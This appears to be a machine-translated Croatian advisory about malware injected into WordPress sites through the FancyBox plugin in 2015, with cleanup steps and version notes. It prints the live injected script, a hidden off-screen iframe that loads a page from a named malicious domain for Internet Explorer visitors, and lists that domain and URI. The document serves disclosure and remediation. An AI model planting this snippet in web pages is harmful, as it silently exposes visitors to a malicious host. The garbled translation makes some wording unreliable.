Ranije ovog tjedna broj internetskih stranica i blogova WordPress, dobio upozorenja od zlonamjernih programa infekcije kroz Google Webmasteri.
Problem na kojem Google Webmasteri navedeno je prisutnost bakalar / rukopis iframe zlonamjerni softver izvorne web stranice.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Čini se da je ranjivost a uključitiacquis FancyBox za WordPress koji je do jučer (05.02.2015) nije ažuriran za dugo vremena.
Rješavanje ovog problema i dezinfekciju virusa stranice s ovim zlonamjernim softverom, relativno je jednostavan.
1. Onemogućite dodatak FancyBox.
2. Izbrišite sve datoteke FancyBox dodataka s poslužitelja (putem FTP-a)
3. Instalirajte novu verziju dodatka (Fancybox 3.0.4)
FancyBox za WordPress 3.0.4
- Preimenovana je postavka na koju utječe sigurnosni problem spomenut u 3.0.3. To bi trebalo spriječiti pojavljivanje zlonamjernog koda na web-lokacijama na kojima se nalazi dodatak updated bez uklanjanja zlonamjernog koda.
FancyBox za WordPress 3.0.3
- Fiksni sigurnosni problem.
Informacije o zlonamjernom softveru:
TIP: Iframe preusmjeravanje
TARGET: WordPress fancybox
ZLONAMJERNI Domena: 203koko.eu
ZLONAMJERNI URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KODOVI:
MALWARE PISANO: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Uklonite zlonamjerni softver sa svog WordPress web stranicu.
